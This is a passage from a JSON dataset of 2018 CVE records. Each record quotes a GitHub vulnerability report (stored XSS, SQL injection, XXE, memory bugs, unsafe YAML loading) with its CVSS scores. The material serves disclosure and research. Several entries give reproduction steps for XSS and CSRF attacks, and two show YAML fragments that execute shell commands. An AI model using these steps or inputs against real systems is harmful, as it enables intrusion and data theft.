  29125. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/3",
  29126. "Repo_new": "cuppacms/cuppacms",
  29127. "Issue_Created_At": "2018-08-16T12:43:07Z",
  29128. "description": "XSS (via SVG file upload) in APITAG Affected software: APITAG Type of vulnerability: XSS (via SVG file upload) Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Proof of concept: Step1: Login to the cuppa cms. Step2: In the table manager section, add a new file and there is an upload option choose files and upload a malicious SVG file. URL: URLTAG Step3: Now open that file which was saved as NUMBERTAG svg the below output will be shown. URL: FILETAG executed FILETAG",
  29129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29130. "severity": "MEDIUM",
  29131. "baseScore": 5.4,
  29132. "impactScore": 2.7,
  29133. "exploitabilityScore": 2.3
  29134. },
  29135. {
  29136. "CVE_ID": "CVE-2018-19919",
  29137. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/19",
  29138. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/19",
  29139. "Repo_new": "pixelimity/pixelimity",
  29140. "Issue_Created_At": "2018-11-03T06:55:09Z",
  29141. "description": "Stored XSS in Pixelimity CMS. Affected software: Pixelimity CMS Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: Subrion CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: FILETAG Vulnerable parameter: Title Proof of concept NUMBERTAG Login as admin NUMBERTAG Locate URL FILETAG and click on APITAG New NUMBERTAG Put XSS payload in the \"data FILETAG NUMBERTAG isit the link URLTAG to execute payload. FILETAG",
  29142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29143. "severity": "MEDIUM",
  29144. "baseScore": 4.8,
  29145. "impactScore": 2.7,
  29146. "exploitabilityScore": 1.7
  29147. },
  29148. {
  29149. "CVE_ID": "CVE-2018-19923",
  29150. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/2",
  29151. "Issue_Url_new": "https://github.com/venan24/scms/issues/2",
  29152. "Repo_new": "venan24/scms",
  29153. "Issue_Created_At": "2018-12-05T07:42:17Z",
  29154. "description": "scms NUMBERTAG csrf + stored xss. An issue was discovered in Sales & Company Management System (SCMS) through NUMBERTAG APITAG is a discrepancy in email checking between the component that validates the email verification code and the component that performs client-side validation. Thus, it is possible to update the database with an unvalidated value, leading to stored XSS. This vulnerability occurs via FILETAG FILETAG Enter an arbitrary email address and click the button; after a moment the validation code is received. FILETAG Now enter the code and update the email with a payload like this, then click the button. FILETAG Capture the request via Burp Suite and generate the CSRF PoC FILETAG click the img tag FILETAG",
  29155. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29156. "severity": "HIGH",
  29157. "baseScore": 8.8,
  29158. "impactScore": 5.9,
  29159. "exploitabilityScore": 2.8
  29160. },
  29161. {
  29162. "CVE_ID": "CVE-2018-19925",
  29163. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/3",
  29164. "Issue_Url_new": "https://github.com/venan24/scms/issues/3",
  29165. "Repo_new": "venan24/scms",
  29166. "Issue_Created_At": "2018-12-05T10:07:57Z",
  29167. "description": "scms NUMBERTAG sql injection. An issue was discovered in Sales & Company Management System (SCMS). It has SQL injection during the order operation via the FILETAG O_state parameter. In line NUMBERTAG the parameter state is concatenated directly into the SQL statement CODETAG FILETAG As for the parameter state, it comes from line NUMBERTAG Although SCMS filters some characters FILETAG the filtering is insufficient and SQL injection is still possible ERRORTAG FILETAG",
  29168. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29169. "severity": "CRITICAL",
  29170. "baseScore": 9.8,
  29171. "impactScore": 5.9,
  29172. "exploitabilityScore": 3.9
  29173. },
  29174. {
  29175. "CVE_ID": "CVE-2018-19939",
  29176. "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/972",
  29177. "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/972",
  29178. "Repo_new": "micode/xiaomi_kernel_opensource",
  29179. "Issue_Created_At": "2018-11-18T12:50:05Z",
  29180. "description": "NULL pointer dereferencing in the touchscreen driver of daisy o oss branch. There is a suspected NULL pointer dereference issue ( CVETAG with the daisy o oss branch, in PATHTAG line NUMBERTAG When kmalloc fails (line NUMBERTAG page remains NULL, but kfree is called (line NUMBERTAG on it, which is reported as a NULL pointer dereference. Note that kfree() in the Linux kernel accepts a NULL pointer as a no-op, so an actual crash would have to come from a later use of page rather than from the kfree() call itself; verify against the driver source. A possible fix is to remove that line.",
  29181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29182. "severity": "HIGH",
  29183. "baseScore": 7.5,
  29184. "impactScore": 3.6,
  29185. "exploitabilityScore": 3.9
  29186. },
  29187. {
  29188. "CVE_ID": "CVE-2018-19974",
  29189. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/999",
  29190. "Issue_Url_new": "https://github.com/virustotal/yara/issues/999",
  29191. "Repo_new": "virustotal/yara",
  29192. "Issue_Created_At": "2018-12-08T13:10:44Z",
  29193. "description": "Compiled rules can execute malicious code regardless of PARANOID_EXEC. A malicious compiled rule file could escape YARA's virtual machine and execute arbitrary code despite the added checks introduced by APITAG . This is possible due to the design of the virtual machine, which stores and operates on pointers to APITAG s from the virtual stack, as well as the following bugs: APITAG can be used to read a DWORD from any arbitrary address; the VM scratch memory is uninitialized and could leak important addresses from the real stack. Compiled rule files should therefore be treated as trusted code, not as untrusted data. I have requested CVE IDs for these issues and will update here once they are assigned.",
  29194. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  29195. "severity": "MEDIUM",
  29196. "baseScore": 5.5,
  29197. "impactScore": 3.6,
  29198. "exploitabilityScore": 1.8
  29199. },
  29200. {
  29201. "CVE_ID": "CVE-2018-1999021",
  29202. "Issue_Url_old": "https://github.com/gleez/cms/issues/797",
  29203. "Issue_Url_new": "https://github.com/gleez/cms/issues/797",
  29204. "Repo_new": "gleez/cms",
  29205. "Issue_Created_At": "2018-07-18T11:05:56Z",
  29206. "description": "Stored XSS in profile page. Description : A cross-site scripting (XSS) vulnerability in Gleez CMS allows remote authenticated users to inject arbitrary JavaScript or HTML via the profile page editor, which results in a stored XSS on their public profile. Vulnerability Type : Stored XSS Attack Vectors NUMBERTAG Go to your profile page editor URLTAG URLTAG NUMBERTAG Set your home page URL to : APITAG Now when someone views your profile page, APITAG will be executed.",
  29207. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29208. "severity": "MEDIUM",
  29209. "baseScore": 5.4,
  29210. "impactScore": 2.7,
  29211. "exploitabilityScore": 2.3
  29212. },
  29213. {
  29214. "CVE_ID": "CVE-2018-19991",
  29215. "Issue_Url_old": "https://github.com/alexazhou/VeryNginx/issues/218",
  29216. "Issue_Url_new": "https://github.com/alexazhou/verynginx/issues/218",
  29217. "Repo_new": "alexazhou/verynginx",
  29218. "Issue_Created_At": "2018-12-09T06:45:59Z",
  29219. "description": "\u7f3a\u5c11\u9519\u8bef\u5904\u7406\u5bfc\u81f4waf\u53ef\u4ee5\u88ab\u7ed5\u8fc7. get_post_args \u548c get_uri_args NUMBERTAG APITAG \u6f0f\u6d1e\u8bc1\u660epython\u811a\u672c\uff1a CODETAG \u5b98\u65b9\u5efa\u8bae\u662f\u4f7f\u7528\u4ee5\u4e0b\u4ee3\u7801\u62d2\u7edd\u53c2\u6570\u8fc7\u591a\u7684\u8bf7\u6c42 ERRORTAG",
  29220. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29221. "severity": "CRITICAL",
  29222. "baseScore": 9.8,
  29223. "impactScore": 5.9,
  29224. "exploitabilityScore": 3.9
  29225. },
  29226. {
  29227. "CVE_ID": "CVE-2018-20004",
  29228. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/233",
  29229. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/233",
  29230. "Repo_new": "michaelrsweet/mxml",
  29231. "Issue_Created_At": "2018-12-03T02:38:09Z",
  29232. "description": "Stack buffer overflow in Function mxml_write_node. I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause stack buffer overflow in function mxml_write_node in mxml file.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  29233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29234. "severity": "HIGH",
  29235. "baseScore": 8.8,
  29236. "impactScore": 5.9,
  29237. "exploitabilityScore": 2.8
  29238. },
  29239. {
  29240. "CVE_ID": "CVE-2018-20005",
  29241. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/234",
  29242. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/234",
  29243. "Repo_new": "michaelrsweet/mxml",
  29244. "Issue_Created_At": "2018-12-03T03:05:01Z",
  29245. "description": "heap use after free in Function APITAG I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause heap use after free in APITAG in mxml search.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  29246. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29247. "severity": "MEDIUM",
  29248. "baseScore": 5.5,
  29249. "impactScore": 3.6,
  29250. "exploitabilityScore": 1.8
  29251. },
  29252. {
  29253. "CVE_ID": "CVE-2018-20006",
  29254. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/3",
  29255. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/3",
  29256. "Repo_new": "qinggan/phpok",
  29257. "Issue_Created_At": "2018-12-08T10:00:23Z",
  29258. "description": "phpok NUMBERTAG Stored XSS vulnerability that can steal the administrator cookie. Visit the url: URLTAG Step NUMBERTAG Input an XSS payload in the title parameter, such as ERRORTAG FILETAG ERRORTAG Step NUMBERTAG When the administrator logs in and moves the mouse over the message to view its information, it will trigger the payload. FILETAG FILETAG",
  29259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29260. "severity": "MEDIUM",
  29261. "baseScore": 6.1,
  29262. "impactScore": 2.7,
  29263. "exploitabilityScore": 2.8
  29264. },
  29265. {
  29266. "CVE_ID": "CVE-2018-20009",
  29267. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/88",
  29268. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/88",
  29269. "Repo_new": "domainmod/domainmod",
  29270. "Issue_Created_At": "2018-12-07T12:13:35Z",
  29271. "description": "Two Stored XSS in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows a remote (authenticated) attacker to inject arbitrary script or html. Being stored, it will impact all users who have permission to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Go to the vulnerable endpoint; in the ssl provider name and ssl provider's url fields put the xss payload \"> APITAG FILETAG Vulnerable Endpoint: FILETAG Steps: Go to the vulnerable endpoint; in the username field put the xss payload \"> APITAG FILETAG",
  29272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29273. "severity": "MEDIUM",
  29274. "baseScore": 4.8,
  29275. "impactScore": 2.7,
  29276. "exploitabilityScore": 1.7
  29277. },
  29278. {
  29279. "CVE_ID": "CVE-2018-20017",
  29280. "Issue_Url_old": "https://github.com/source-trace/semcms/issues/1",
  29281. "Issue_Url_new": "https://github.com/source-trace/semcms/issues/1",
  29282. "Repo_new": "source-trace/semcms",
  29283. "Issue_Created_At": "2018-12-07T08:17:45Z",
  29284. "description": "There is a stored XSS vulnerability. An issue was discovered in semcms APITAG has a stored XSS which allows a remote attacker to execute web script. POC APITAG Vulnerability point FILETAG APITAG as admin FILETAG APITAG this part FILETAG FILETAG APITAG code FILETAG NUMBERTAG submit and view the homepage FILETAG",
  29285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29286. "severity": "MEDIUM",
  29287. "baseScore": 4.8,
  29288. "impactScore": 2.7,
  29289. "exploitabilityScore": 1.7
  29290. },
  29291. {
  29292. "CVE_ID": "CVE-2018-20027",
  29293. "Issue_Url_old": "https://github.com/lisa-lab/pylearn2/issues/1593",
  29294. "Issue_Url_new": "https://github.com/lisa-lab/pylearn2/issues/1593",
  29295. "Repo_new": "lisa-lab/pylearn2",
  29296. "Issue_Created_At": "2018-12-11T01:34:42Z",
  29297. "description": "APITAG method is vulnerable. import APITAG test_str PATHTAG [\"ls\"]' test_load = APITAG Hi, there is a vulnerability in the load methods in APITAG (see APITAG above). Loading attacker-controlled input can execute arbitrary Python code, resulting in command execution.",
  29298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29299. "severity": "CRITICAL",
  29300. "baseScore": 9.8,
  29301. "impactScore": 5.9,
  29302. "exploitabilityScore": 3.9
  29303. },
  29304. {
  29305. "CVE_ID": "CVE-2018-20059",
  29306. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/486",
  29307. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/486",
  29308. "Repo_new": "pippo-java/pippo",
  29309. "Issue_Created_At": "2018-12-11T07:08:21Z",
  29310. "description": "xxe. Hello, I am a member of the NUMBERTAG Code Guard team. In our open source project code audit, we found that Pippo has APITAG vulnerabilities. Details are as follows. PATHTAG FILETAG Because the XML parser does not disable DTD processing, APITAG attacks can occur when the content parameter is controlled by a malicious attacker.",
  29311. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29312. "severity": "CRITICAL",
  29313. "baseScore": 9.8,
  29314. "impactScore": 5.9,
  29315. "exploitabilityScore": 3.9
  29316. },
  29317. {
  29318. "CVE_ID": "CVE-2018-20061",
  29319. "Issue_Url_old": "https://github.com/frappe/erpnext/issues/15337",
  29320. "Issue_Url_new": "https://github.com/frappe/erpnext/issues/15337",
  29321. "Repo_new": "frappe/erpnext",
  29322. "Issue_Created_At": "2018-09-06T23:36:16Z",
  29323. "description": "SQL Injection from API?. If you go here: PATHTAG on any erpnext install you get an SQL syntax error, which makes me worry about what else can be done with some APITAG names (an SQL syntax error triggered from a URL parameter suggests that the value reaches the query text unquoted). They should probably be enclosed in ` either way, even if this is not a security issue :)",
  29324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29325. "severity": "HIGH",
  29326. "baseScore": 7.5,
  29327. "impactScore": 3.6,
  29328. "exploitabilityScore": 3.9
  29329. },
  29330. {
  29331. "CVE_ID": "CVE-2018-20062",
  29332. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/21",
  29333. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/21",
  29334. "Repo_new": "nangge/nonecms",
  29335. "Issue_Created_At": "2018-12-11T07:08:21Z",
  29336. "description": "There is a vulnerability that can getshell. PATHTAG ERRORTAG ERRORTAG ERRORTAG In the process of processing the route, Config::get(\u2018var_pathinfo\u2019) is used as the receiving process pathinfo, and this value is s by default. then, it will form a calling process: PATHTAG In APITAG ERRORTAG we can use input method POC: URLTAG",
  29337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29338. "severity": "CRITICAL",
  29339. "baseScore": 9.8,
  29340. "impactScore": 5.9,
  29341. "exploitabilityScore": 3.9
  29342. },
  29343. {
  29344. "CVE_ID": "CVE-2018-20064",
  29345. "Issue_Url_old": "https://github.com/doorgets/CMS/issues/12",
  29346. "Issue_Url_new": "https://github.com/doorgets/cms/issues/12",
  29347. "Repo_new": "doorgets/cms",
  29348. "Issue_Created_At": "2018-12-11T05:57:32Z",
  29349. "description": "Modify the contents of the file at will. Create a file under the c APITAG is test FILETAG poc: FILETAG Modify the contents of the file in FILETAG by poc ERRORTAG FILETAG Of course, you can also modify the contents of any file, e.g. to make the web application unusable.",
  29350. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29351. "severity": "HIGH",
  29352. "baseScore": 7.5,
  29353. "impactScore": 3.6,
  29354. "exploitabilityScore": 3.9
  29355. },
  29356. {
  29357. "CVE_ID": "CVE-2018-20094",
  29358. "Issue_Url_old": "https://github.com/xuxueli/xxl-conf/issues/61",
  29359. "Issue_Url_new": "https://github.com/xuxueli/xxl-conf/issues/61",
  29360. "Repo_new": "xuxueli/xxl-conf",
  29361. "Issue_Created_At": "2018-12-05T07:40:26Z",
  29362. "description": "\u8def\u5f84\u904d\u5386\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG APITAG APITAG = \"keys\", required = false) APITAG keys \u63a5\u6536\u4e86\u8bf7\u6c42\u4e2d\u7684\u53c2\u6570keys\uff0c\u800c\u8be5\u53c2\u6570\u662f\u53d7\u7528\u6237\u63a7\u5236\u7684\u3002 FILETAG APITAG APITAG",
  29363. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29364. "severity": "HIGH",
  29365. "baseScore": 7.5,
  29366. "impactScore": 3.6,
  29367. "exploitabilityScore": 3.9
  29368. },
  29369. {
  29370. "CVE_ID": "CVE-2018-20095",
  29371. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/341",
  29372. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/341",
  29373. "Repo_new": "axiomatic-systems/bento4",
  29374. "Issue_Created_At": "2018-12-11T09:25:26Z",
  29375. "description": "Memory allocation failure for a large amount of memory in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input leads to a failed memory allocation (denial of service) in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29376. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29377. "severity": "MEDIUM",
  29378. "baseScore": 6.5,
  29379. "impactScore": 3.6,
  29380. "exploitabilityScore": 2.8
  29381. },
  29382. {
  29383. "CVE_ID": "CVE-2018-20096",
  29384. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/590",
  29385. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/590",
  29386. "Repo_new": "exiv2/exiv2",
  29387. "Issue_Created_At": "2018-12-10T03:07:29Z",
  29388. "description": "Several bugs in exi NUMBERTAG rc3. I have tested them in latest version NUMBERTAG RC NUMBERTAG exi NUMBERTAG pR pngimage heap bof poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG Y NUMBERTAG O NUMBERTAG D NUMBERTAG adjust tiffimage_int out of bound read poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG M'set APITAG lang=\"de DE\" Euros' jp2image heap bof poc NUMBERTAG URLTAG NUMBERTAG iptcprint abort poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG insert jp2image infiniteloop poc NUMBERTAG URLTAG And, more info can be found at URLTAG",
  29389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29390. "severity": "MEDIUM",
  29391. "baseScore": 6.5,
  29392. "impactScore": 3.6,
  29393. "exploitabilityScore": 2.8
  29394. },
  29395. {
  29396. "CVE_ID": "CVE-2018-20133",
  29397. "Issue_Url_old": "https://github.com/dexter2206/ymlref/issues/2",
  29398. "Issue_Url_new": "https://github.com/dexter2206/ymlref/issues/2",
  29399. "Repo_new": "dexter2206/ymlref",
  29400. "Issue_Created_At": "2018-12-14T00:08:11Z",
  29401. "description": "APITAG method is vulnerable. import ymlref.api test_str PATHTAG [\"dir\"]' APITAG Hi, there is a vulnerability in load methods in APITAG see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  29402. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29403. "severity": "CRITICAL",
  29404. "baseScore": 9.8,
  29405. "impactScore": 5.9,
  29406. "exploitabilityScore": 3.9
  29407. },
  29408. {
  29409. "CVE_ID": "CVE-2018-20145",
  29410. "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/1073",
  29411. "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/1073",
  29412. "Repo_new": "eclipse/mosquitto",
  29413. "Issue_Created_At": "2018-12-07T13:09:07Z",
  29414. "description": "Mosquitto ignores acl_file on the default listener if per_listener_settings=true. When mosquitto is configured as follows: APITAG Then the default listener (on port NUMBERTAG ignores the acl_file. This can easily be confirmed by specifying a non-existent acl file: Mosquitto starts up fine, without complaining about the non-existent file, and when trying to send messages no ACLs are in effect. This is a potential security risk, since clients on the default listener can publish and subscribe without the intended topic restrictions.",
  29415. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29416. "severity": "HIGH",
  29417. "baseScore": 7.5,
  29418. "impactScore": 3.6,
  29419. "exploitabilityScore": 3.9
  29420. },
  29421. {
  29422. "CVE_ID": "CVE-2018-20157",
  29423. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1907",
  29424. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1907",
  29425. "Repo_new": "openrefine/openrefine",
  29426. "Issue_Created_At": "2018-12-14T14:57:37Z",
  29427. "description": "XXE Vulnerability in creating project. Describe the bug APITAG NUMBERTAG and below) has a XXE URLTAG vulnerability that can be triggered through a data import. It is possible to steal data from an APITAG user. Please consider disabling external DTDs URLTAG . To Reproduce See the video (zipped because of GH file extension restrictions) FILETAG Current Results File content is sent over FTP; no feedback is shown to the user. Desktop (please complete the following information): Tested on (desktop version is not important) ERRORTAG APITAG (please complete the following information): Version NUMBERTAG and below) Datasets ext.dtd APITAG FILETAG APITAG Additional info Sorry that i was a bit inactive during the last issue :).",
  29428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29429. "severity": "HIGH",
  29430. "baseScore": 7.5,
  29431. "impactScore": 3.6,
  29432. "exploitabilityScore": 3.9
  29433. },
  29434. {
  29435. "CVE_ID": "CVE-2018-20164",
  29436. "Issue_Url_old": "https://github.com/ua-parser/uap-core/issues/332",
  29437. "Issue_Url_new": "https://github.com/ua-parser/uap-core/issues/332",
  29438. "Repo_new": "ua-parser/uap-core",
  29439. "Issue_Created_At": "2018-07-30T13:42:04Z",
  29440. "description": "Performance issue with backtracking caused by some regexes. Hi! We are happy users of uap core via URLTAG but we have recently noticed that some regexes may lead to excessive backtracking (a ReDoS condition, since the user agent string being parsed is attacker-controlled). The regex that caused some issue for us is the following: ^(. APITAG APITAG A simple python script like the following hangs on my laptop: CODETAG The main problem seems to be backtracking caused by the various blocks with .?, which doesn't happen if the regex is split into multiple ones, for example: APITAG The example that I brought up is of course a corner case, but even shorter strings with the same format can cause slow downs in parsing or hanging. It would be great to find a solution that is probably more verbose but that doesn't lead to these issues. Thanks in advance! Luca",
  29441. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  29442. "severity": "MEDIUM",
  29443. "baseScore": 5.3,
  29444. "impactScore": 1.4,
  29445. "exploitabilityScore": 3.9
  29446. },
  29447. {
  29448. "CVE_ID": "CVE-2018-20186",
  29449. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/342",
  29450. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/342",
  29451. "Repo_new": "axiomatic-systems/bento4",
  29452. "Issue_Created_At": "2018-12-17T08:48:55Z",
  29453. "description": "Memory allocation failure for a large amount of memory in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input leads to a failed memory allocation (denial of service) in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash2.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29454. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29455. "severity": "MEDIUM",
  29456. "baseScore": 6.5,
  29457. "impactScore": 3.6,
  29458. "exploitabilityScore": 2.8
  29459. },
  29460. {
  29461. "CVE_ID": "CVE-2018-20190",
  29462. "Issue_Url_old": "https://github.com/sass/libsass/issues/2786",
  29463. "Issue_Url_new": "https://github.com/sass/libsass/issues/2786",
  29464. "Repo_new": "sass/libsass",
  29465. "Issue_Created_At": "2018-12-04T05:34:36Z",
  29466. "description": "Null pointer dereference in APITAG ) APITAG I fuzzed and found another null pointer dereference problem in APITAG ) APITAG The problem exists in both the NUMBERTAG version and the master branch ( PATHTAG ), with the same crash stack. Build libsass/sassc with APITAG APITAG Run APITAG and the program crashes. (sass_npd is here: URLTAG Crash stack Crash stack (of master branch): ERRORTAG It seems that in function APITAG , the right-hand variable (not NULL) is cast and becomes a NULL APITAG APITAG at line APITAG . CODETAG",
  29467. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29468. "severity": "MEDIUM",
  29469. "baseScore": 6.5,
  29470. "impactScore": 3.6,
  29471. "exploitabilityScore": 2.8
  29472. },
  29473. {
  29474. "CVE_ID": "CVE-2018-20194",
  29475. "Issue_Url_old": "https://github.com/knik0/faad2/issues/21",
  29476. "Issue_Url_new": "https://github.com/knik0/faad2/issues/21",
  29477. "Repo_new": "knik0/faad2",
  29478. "Issue_Created_At": "2018-12-17T05:12:17Z",
  29479. "description": "stack buffer underflow in function APITAG Hi, I found a stack buffer underflow (an access before the start of a stack buffer) bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  29480. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29481. "severity": "HIGH",
  29482. "baseScore": 7.8,
  29483. "impactScore": 5.9,
  29484. "exploitabilityScore": 1.8
  29485. },
  29486. {
  29487. "CVE_ID": "CVE-2018-20196",
  29488. "Issue_Url_old": "https://github.com/knik0/faad2/issues/19",
  29489. "Issue_Url_new": "https://github.com/knik0/faad2/issues/19",
  29490. "Repo_new": "knik0/faad2",
  29491. "Issue_Created_At": "2018-12-17T04:08:19Z",
  29492. "description": "stack buffer overflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29494. "severity": "HIGH",
  29495. "baseScore": 7.8,
  29496. "impactScore": 5.9,
  29497. "exploitabilityScore": 1.8
  29498. },
  29499. {
  29500. "CVE_ID": "CVE-2018-20197",
  29501. "Issue_Url_old": "https://github.com/knik0/faad2/issues/20",
  29502. "Issue_Url_new": "https://github.com/knik0/faad2/issues/20",
  29503. "Repo_new": "knik0/faad2",
  29504. "Issue_Created_At": "2018-12-17T04:11:39Z",
  29505. "description": "stack buffer underflow in function APITAG Hi, I found a stack buffer underflow (an access before the start of a stack buffer) bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  29506. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29507. "severity": "HIGH",
  29508. "baseScore": 7.8,
  29509. "impactScore": 5.9,
  29510. "exploitabilityScore": 1.8
  29511. },
  29512. {
  29513. "CVE_ID": "CVE-2018-20198",
  29514. "Issue_Url_old": "https://github.com/knik0/faad2/issues/23",
  29515. "Issue_Url_new": "https://github.com/knik0/faad2/issues/23",
  29516. "Repo_new": "knik0/faad2",
  29517. "Issue_Created_At": "2018-12-17T06:17:36Z",
  29518. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29519. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29520. "severity": "MEDIUM",
  29521. "baseScore": 5.5,
  29522. "impactScore": 3.6,
  29523. "exploitabilityScore": 1.8
  29524. },
  29525. {
  29526. "CVE_ID": "CVE-2018-20200",
  29527. "Issue_Url_old": "https://github.com/square/okhttp/issues/4967",
  29528. "Issue_Url_new": "https://github.com/square/okhttp/issues/4967",
  29529. "Repo_new": "square/okhttp",
  29530. "Issue_Created_At": "2019-04-19T09:16:04Z",
  29531. "description": "CVETAG : APITAG allows man in the middle attackers to bypass certificate pinning. Apparently there was CVETAG CVETAG for an issue described as > APITAG in APITAG NUMBERTAG through NUMBERTAG allows man in the middle attackers to bypass certificate pinning by changing APITAG and the boolean values while hooking the application. A report is at URLTAG Was this forwarded already? Note that the described technique requires the attacker to already be hooking (instrumenting) the running application, so it is not a remote bypass; an attacker with that level of control over the process can generally defeat any in-app pinning check.",
